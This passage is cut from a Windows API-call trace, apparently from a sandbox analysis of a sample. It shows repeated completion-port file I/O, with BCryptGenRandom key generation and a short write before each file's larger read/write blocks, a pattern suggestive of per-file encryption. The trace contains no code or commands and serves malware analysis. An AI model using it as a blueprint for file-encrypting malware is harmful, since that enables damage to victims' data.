lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0113.332] CloseHandle (hObject=0x81c) returned 1 [0113.333] free (_Block=0x3d70450) [0113.333] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0113.357] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.357] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.357] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0113.357] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.358] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.358] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0113.358] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0113.358] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0113.358] free (_Block=0x77d7a8) [0113.358] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0113.358] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0113.359] free (_Block=0x2071c20) [0113.359] free (_Block=0x2071d30) [0113.359] free (_Block=0x77d8b0) [0113.359] WriteFile (in: hFile=0x340, lpBuffer=0x3ef003c, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0113.359] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0113.383] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x244, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0113.383] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0113.391] ReadFile (in: hFile=0x3bc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x128, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0113.392] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0113.399] WriteFile (in: hFile=0x2f4, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x230, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0113.399] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0113.414] ReadFile (in: hFile=0x13c0, lpBuffer=0x3db04f4, nNumberOfBytesToRead=0x1034, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db04c0 | out: lpBuffer=0x3db04f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db04c0) returned 1 [0113.427] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0113.433] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.433] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.433] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0113.433] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.434] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.434] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0113.434] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0113.434] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0113.434] free (_Block=0x77d7a8) [0113.434] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0113.434] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0113.435] free (_Block=0x2071c20) [0113.435] free (_Block=0x2071d30) [0113.435] free (_Block=0x77d8b0) [0113.435] WriteFile (in: hFile=0x2f4, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0113.435] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0113.442] CloseHandle (hObject=0x81c) returned 1 [0113.444] free (_Block=0x1ff1e60) [0113.445] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0113.450] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.451] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.451] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0113.451] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.451] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.451] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0113.452] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0113.452] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0113.452] free (_Block=0x77d7a8) [0113.452] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0113.452] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0113.452] free (_Block=0x2071c20) [0113.452] free (_Block=0x2071d30) [0113.452] free (_Block=0x77d8b0) [0113.452] WriteFile (in: hFile=0x13c0, lpBuffer=0x3db04f4*, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db04c0 | out: lpBuffer=0x3db04f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db04c0) returned 1 [0113.453] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0113.478] WriteFile (in: hFile=0x13c0, lpBuffer=0x3db04f4, nNumberOfBytesToWrite=0x1820, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db04c0 | out: lpBuffer=0x3db04f4, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db04c0) returned 0x0 [0113.478] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0113.486] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.486] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.486] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0113.486] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.487] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.487] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0113.487] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0113.487] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0113.487] free (_Block=0x77d7a8) [0113.487] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0113.488] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0113.488] free (_Block=0x2071c20) [0113.488] free (_Block=0x2071d30) [0113.488] free (_Block=0x77d8b0) [0113.488] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.488] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0113.572] CloseHandle (hObject=0x2f4) returned 1 [0113.577] free (_Block=0x3d70450) [0113.580] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0113.586] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.586] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.587] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0113.587] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.587] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.587] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0113.587] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0113.588] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0113.588] free (_Block=0x77d7a8) [0113.588] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0113.588] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0113.588] free (_Block=0x2071c20) [0113.588] free (_Block=0x2071d30) [0113.588] free (_Block=0x77d8b0) [0113.588] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.589] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0113.593] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x3670, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.594] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0113.594] CloseHandle (hObject=0x2f4) returned 1 [0113.595] free (_Block=0x1ff1e60) [0113.595] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0113.605] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.606] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.606] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0113.606] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.606] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.606] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0113.607] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0113.607] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0113.607] free (_Block=0x77d7a8) [0113.607] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0113.607] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0113.607] free (_Block=0x2071c20) [0113.608] free (_Block=0x2071d30) [0113.608] free (_Block=0x77d8b0) [0113.608] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.608] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0113.609] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1b20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.609] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0113.624] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x3044, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.628] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0113.700] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1a7c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.705] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0113.719] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x8e8, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.719] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0113.719] CloseHandle (hObject=0x2f4) returned 1 [0113.731] free (_Block=0x1ff1e60) [0113.731] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0113.741] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.741] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.741] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0113.741] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.742] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.742] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0113.742] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0113.742] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0113.742] free (_Block=0x77d7a8) [0113.742] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0113.742] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0113.743] free (_Block=0x2071c20) [0113.743] free (_Block=0x2071d30) [0113.743] free (_Block=0x77d8b0) [0113.743] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.743] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0113.743] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.743] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0113.757] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x439c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.758] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0113.771] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1f08, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.772] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0113.773] CloseHandle (hObject=0x2f4) returned 1 [0113.774] free (_Block=0x1ff1e60) [0113.774] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0113.783] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.784] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.784] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0113.784] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.784] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.784] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0113.785] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0113.785] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0113.785] free (_Block=0x77d7a8) [0113.785] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0113.785] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0113.785] free (_Block=0x2071c20) [0113.785] free (_Block=0x2071d30) [0113.785] free (_Block=0x77d8b0) [0113.785] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.785] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0113.787] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x2950, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.787] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0113.807] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x12ee, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.808] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0113.808] CloseHandle (hObject=0x2f4) returned 1 [0113.812] free (_Block=0x1ff1e60) [0113.812] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0113.822] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.823] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.823] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0113.823] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.823] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.823] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0113.824] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0113.824] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0113.824] free (_Block=0x77d7a8) [0113.824] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0113.824] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0113.824] free (_Block=0x2071c20) [0113.824] free (_Block=0x2071d30) [0113.825] free (_Block=0x77d8b0) [0113.825] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.825] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0113.826] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x45c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.826] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0113.872] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x2eda, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 